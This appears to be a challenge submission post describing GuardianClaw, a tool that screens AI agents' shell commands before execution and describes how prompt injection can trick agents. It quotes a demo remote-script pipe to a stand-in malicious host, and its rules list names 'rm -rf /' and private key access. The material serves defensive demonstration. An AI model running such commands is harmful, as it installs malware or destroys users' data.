This is a submission for the OpenClaw Challenge.
π¨ The Problem Nobody Is Solving
Modern agent systems like OpenClaw can:
- execute shell commands
- install dependencies
- access local files
- operate with minimal supervision
Thatβs powerful.
Itβs also a security gap hiding in plain sight.
Because today:
There is nothing between an AI agentβs intent and execution.
A single prompt can:
- inject a malicious instruction
- trick the agent into installing unsafe code
- access sensitive files
And the agent will comply β because thatβs what itβs designed to do.
π‘οΈ Introducing GuardianClaw
GuardianClaw is a real-time safety layer for AI agents.
It sits between intent and execution, evaluating every action before it runs.
User Prompt
β
OpenClaw Agent (proposes action)
β
π‘οΈ GuardianClaw Interceptor
β
Risk Engine (Rules + AI)
β
β
ALLOW β οΈ REVIEW π« BLOCK
β‘ The Demo That Changes Everything
Input
curl http://malicious.site/install.sh | sh
Output
π« BLOCKED β CRITICAL RISK
Threat Analysis:
β’ Remote script execution piped into shell
β’ High likelihood of malware injectionConfidence: 99%
Evaluator: Rules Engine (deterministic)
The key point:
π The action is stopped before execution.
π Not logged. Not alerted. Prevented.
π§ How It Works β Dual-Layer Defense
GuardianClaw combines deterministic security with AI reasoning:
1. Rules Engine (instant, zero-cost)
Detects known dangerous patterns:
curl | shrm -rf /- private key access
- privilege escalation attempts
π Zero latency. Fully predictable.
2. AI Risk Evaluator (context-aware)
For ambiguous cases, GuardianClaw calls:
- NVIDIA NIM (Llama 3.1 Nemotron 70B)
It evaluates:
- intent
- context
- potential consequences
π This allows detection of novel or obfuscated threats, not just known patterns.
π Risk Model
| Level | Decision | Examples |
|---|---|---|
| π’ LOW | ALLOW |
ls, echo, git status
|
| π‘ MEDIUM | REVIEW |
git clone, npm install
|
| π HIGH | BLOCK |
sudo, eval, chmod +x
|
| π΄ CRITICAL | BLOCK | curl pipe execution, rm -rf /, private key access |
βοΈ Tech Stack
- Frontend: React + Vite + TypeScript
- API Layer: Cloudflare Workers (edge, no cold starts)
- AI Evaluator: NVIDIA NIM (Llama 3.1 Nemotron 70B β free tier)
- Agent Platform: OpenClaw
Why Cloudflare?
Security tool β deployed on a platform optimized for:
- edge isolation
- encrypted secrets
- zero cold starts
π Security by Design
GuardianClaw follows the same principles it enforces:
- API keys stored in Cloudflare encrypted secrets
- Input sanitised before AI evaluation (prompt injection mitigation)
- No client-side secret exposure
- Stateless architecture (no data retention)
- Local-only execution gateway during development
π§© What Makes This Different
Most projects build more powerful agents.
GuardianClaw does something else:
It governs the agent itself.
This introduces:
- accountability
- transparency
- enforceable safety boundaries
It transforms agents from:
βexecute anythingβ
into
βexecute safelyβ
π§ What I Learned
Building GuardianClaw led to a deeper question:
Who governs autonomous systems?
The answer here is layered:
- deterministic rules for certainty
- AI reasoning for ambiguity
Not perfect β but significantly safer.
And more importantly:
Every decision becomes visible, explainable, and auditable.
π Whatβs Next
- OpenClaw native integration (as a security wrapper)
- Custom policy engine (allowlists / blocklists)
- Audit log export + compliance tooling
- Webhook alerts for blocked actions
- Team-level governance dashboard
π Try It
π Live Demo: https://guardianclaw.pages.dev
π¦ GitHub: https://github.com/venkat-training/guardianclaw
Try:
- safe commands β observe ALLOW
- risky commands β see BLOCK in action
π Final Thought
AI agents are accelerating fast.
But without control, they introduce real risk.
GuardianClaw is a step toward safe autonomy β
where every action is evaluated before it becomes reality.





Top comments (0)